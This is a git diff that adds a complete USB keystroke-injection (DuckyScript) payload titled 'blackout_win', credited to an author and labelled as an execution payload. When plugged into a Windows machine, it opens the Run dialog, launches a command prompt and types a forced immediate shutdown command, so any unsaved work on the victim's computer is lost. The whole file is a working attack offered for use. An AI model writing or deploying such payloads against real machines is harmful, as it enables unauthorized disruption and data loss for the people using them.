diff --git a/blackout_win.txt b/blackout_win.txt new file mode 100644 index 0000000..9a7bb67 --- /dev/null +++ b/blackout_win.txt @@ -0,0 +1,14 @@ +REM Author: Avaje +REM Description: Shuts down windows automatically +REM Version: 1.0 +REM Category: Execution +DELAY 750 +WINDOWS d +DELAY 300 +WINDOWS r +DELAY 300 +STRING cmd +ENTER +DELAY 1500 +STRING shutdown /p /f +ENTER